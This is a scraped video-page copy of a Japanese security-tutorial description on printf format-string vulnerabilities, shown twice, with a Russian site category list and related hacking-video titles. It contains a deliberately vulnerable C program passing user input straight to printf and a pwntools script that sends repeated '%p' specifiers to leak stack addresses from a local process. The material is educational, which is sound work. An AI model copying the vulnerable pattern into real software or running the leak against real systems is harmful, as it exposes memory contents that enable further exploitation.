- Популярные видео
- Авто
- Видео-блоги
- ДТП, аварии
- Для маленьких
- Еда, напитки
- Животные
- Закон и право
- Знаменитости
- Игры
- Искусство
- Комедии
- Красота, мода
- Кулинария, рецепты
- Люди
- Мото
- Музыка
- Мультфильмы
- Наука, технологии
- Новости
- Образование
- Политика
- Праздники
- Приколы
- Природа
- Происшествия
- Путешествия
- Развлечения
- Ржач
- Семья
- Сериалы
- Спорт
- Стиль жизни
- ТВ передачи
- Танцы
- Технологии
- Товары
- Ужасы
- Фильмы
- Шоу-бизнес
- Юмор
ハッカーはprintfで情報が漏れる仕組みと安全な検証方法をpwntoolsで学ぶ。Simple Format-String入門
◆チャンネル登録はこちら↓
https://www.youtube.com/@whitemarkn?sub_confirmation=1
AIを武器にホワイトハッカーになるチャンネルにようこそ
ペネトレーションテスト&バグバウンティ
「ハッカーはprintfで情報が漏れる仕組みと安全な検証方法をpwntoolsで学ぶ。Simple Format-String入門」です。
「わかりやすく」を追求して動画を作成していきます。
ホワイトハッカー見習いのクロより
◆再生リストはこちらから
https://www.youtube.com/@whitemarkn/playlists
◆動画内の公式アドレスは以下の通り
ハッカーの最強のツールのひとつである「pwntools」入門」
https://whitemarkn.com/penetrationtest/introduction-to-pwntools/
学習用の脆弱なプログラム(vuln_printf.c)
※注意 youtubeの仕様上、<と>は全角になっています。
半角に直して利用してください。
// vuln_printf.c
#include <stdio.h>
int main() {
char buf[200];
printf("Input: ");
fflush(stdout);
if (fgets(buf, sizeof(buf), stdin) != NULL) {
// 脆弱コード:ユーザ入力をそのままprintfへ
printf(buf);
printf("\n");
}
return 0;
}
pwntoolsで自動化(leak_printf.py)
# leak_printf.py
from pwn import *
context.log_level = 'info'
p = process('./vuln_printf')
p.recvuntil(b'Input: ')
payload = ' '.join(['%p'] * 20) # %p を20個並べる
p.sendline(payload.encode())
line = p.recvline(timeout=2).decode().strip()
print("raw leak:", line)
parts = line.split()
addrs = []
for s in parts:
try:
a = int(s, 16)
addrs.append(a)
except:
pass
for i, a in enumerate(addrs):
print(f"{i:2d}: {hex(a)}")
p.close()
◆この動画のお品書き
1.Simple Format-String(出力リーク)とは
2.Simple Format-Stringの背景
3.Simple Format-Stringが引き起こす影響
4.Simple Format-Stringの検証方法
5.Simple Format-Stringの対策・防御方法
6.ハッカーはprintfで情報が漏れる仕組みと安全な検証方法をpwntoolsで学ぶ Simple Format-String入門のまとめ
◆AIを武器にホワイトハッカーになるブログ
https://whitemarkn.com/
◆ハッカーはprintfで情報が漏れる仕組みと安全な検証方法をpwntoolsで学ぶ。Simple Format-String入門の記事はこちら
https://whitemarkn.com/penetrationtest/printf-pwntools/
◆ツイッター
https://twitter.com/panpochan
▼ナレーション 音読さん
https://ondoku3.com/
#pwntools
#printf
#SimpleFormat-String
No.177
こんにちは、
C言語のprintfの仕組みを利用してプログラム内部の情報が外部に漏れる「フォーマット文字列(Format-String)脆弱性」と、その安全な確認方法を分かりやすく解説します。
Видео ハッカーはprintfで情報が漏れる仕組みと安全な検証方法をpwntoolsで学ぶ。Simple Format-String入門 канала AIを武器にホワイトハッカーになる
https://www.youtube.com/@whitemarkn?sub_confirmation=1
AIを武器にホワイトハッカーになるチャンネルにようこそ
ペネトレーションテスト&バグバウンティ
「ハッカーはprintfで情報が漏れる仕組みと安全な検証方法をpwntoolsで学ぶ。Simple Format-String入門」です。
「わかりやすく」を追求して動画を作成していきます。
ホワイトハッカー見習いのクロより
◆再生リストはこちらから
https://www.youtube.com/@whitemarkn/playlists
◆動画内の公式アドレスは以下の通り
ハッカーの最強のツールのひとつである「pwntools」入門」
https://whitemarkn.com/penetrationtest/introduction-to-pwntools/
学習用の脆弱なプログラム(vuln_printf.c)
※注意 youtubeの仕様上、<と>は全角になっています。
半角に直して利用してください。
// vuln_printf.c
#include <stdio.h>
int main() {
char buf[200];
printf("Input: ");
fflush(stdout);
if (fgets(buf, sizeof(buf), stdin) != NULL) {
// 脆弱コード:ユーザ入力をそのままprintfへ
printf(buf);
printf("\n");
}
return 0;
}
pwntoolsで自動化(leak_printf.py)
# leak_printf.py
from pwn import *
context.log_level = 'info'
p = process('./vuln_printf')
p.recvuntil(b'Input: ')
payload = ' '.join(['%p'] * 20) # %p を20個並べる
p.sendline(payload.encode())
line = p.recvline(timeout=2).decode().strip()
print("raw leak:", line)
parts = line.split()
addrs = []
for s in parts:
try:
a = int(s, 16)
addrs.append(a)
except:
pass
for i, a in enumerate(addrs):
print(f"{i:2d}: {hex(a)}")
p.close()
◆この動画のお品書き
1.Simple Format-String(出力リーク)とは
2.Simple Format-Stringの背景
3.Simple Format-Stringが引き起こす影響
4.Simple Format-Stringの検証方法
5.Simple Format-Stringの対策・防御方法
6.ハッカーはprintfで情報が漏れる仕組みと安全な検証方法をpwntoolsで学ぶ Simple Format-String入門のまとめ
◆AIを武器にホワイトハッカーになるブログ
https://whitemarkn.com/
◆ハッカーはprintfで情報が漏れる仕組みと安全な検証方法をpwntoolsで学ぶ。Simple Format-String入門の記事はこちら
https://whitemarkn.com/penetrationtest/printf-pwntools/
◆ツイッター
https://twitter.com/panpochan
▼ナレーション 音読さん
https://ondoku3.com/
#pwntools
#printf
#SimpleFormat-String
No.177
こんにちは、
C言語のprintfの仕組みを利用してプログラム内部の情報が外部に漏れる「フォーマット文字列(Format-String)脆弱性」と、その安全な確認方法を分かりやすく解説します。
Видео ハッカーはprintfで情報が漏れる仕組みと安全な検証方法をpwntoolsで学ぶ。Simple Format-String入門 канала AIを武器にホワイトハッカーになる
Комментарии отсутствуют
Информация о видео
23 октября 2025 г. 20:54:55
00:10:20
Другие видео канала
リターンアドレスと関数の戻り道(episode-06)
大阪・関西万博を狙うサイバー攻撃 過去事例に学ぶリスク
Metasploit3でハッキングの初歩から楽しく学ぶ(3-2) Auxiliary Modules (偵察モジュール)で何ができるのか。【ポートスキャン系】
ハッカーはMaltego4.4.1で情報を可視化する(Kali Linuxツール説明)
北朝鮮の悪いハッカーグループが偽のPythonコーディング課題で仮想通貨開発者を狙う
ハッカーはバグバウンティでパストラバーサル(Path Traversal)の脆弱性を見つける
アドバイザー白猫先生が語る、攻撃者の「論理的な考え方」とは? (episode-02)
最強ハッカーの最終目標はゼロデイエクスプロイト
Metasploit3でハッキングの初歩から楽しく学ぶ(3-1) Auxiliary Modules (偵察モジュール)で何ができるのか。【スキャナー系】
「Burp Suite」を徹底的に使いこなす。パート2 windowsにBurp Suiteをインストール
ハッカーはsqlmcでドメインのすべてのURLにSQLインジェクションがないかチェックします(Kali Linux)
ハッカーはdirbコマンドでウェブサイトの裏側にあるディレクトリやファイルから脆弱性を見つける
バグハンターがCTFで学ぶReverse Engineering入門(初心者が知るべきバイナリ解析とは)
ハッカーはDNSReconでDNSのセキュリティの評価などを調査する(Kali Linuxツール説明)
ホワイトハッカーは一番簡単で無料で出来るPython開発環境「Google Colaboratory」を利用してPython言語でプログラムを作成してCTF問題を解く(開発環境作成編)
ハッカーはsslscanでサーバのSSL/TLS状態を調査する(Kali Linuxツール説明)
ブラックハッカーが思考する11ステップのプロセス
ハッカーが使うLinuxの裏側 forkとexecveでわかるプロセスのしくみ
数学が苦手なハッカーでもわかる、RSA暗号の落とし穴「Small e Attack」をやさしく深掘りしてみた
GDBで「論理的にExploitを組み立てる思考法」(最終回/全8回)
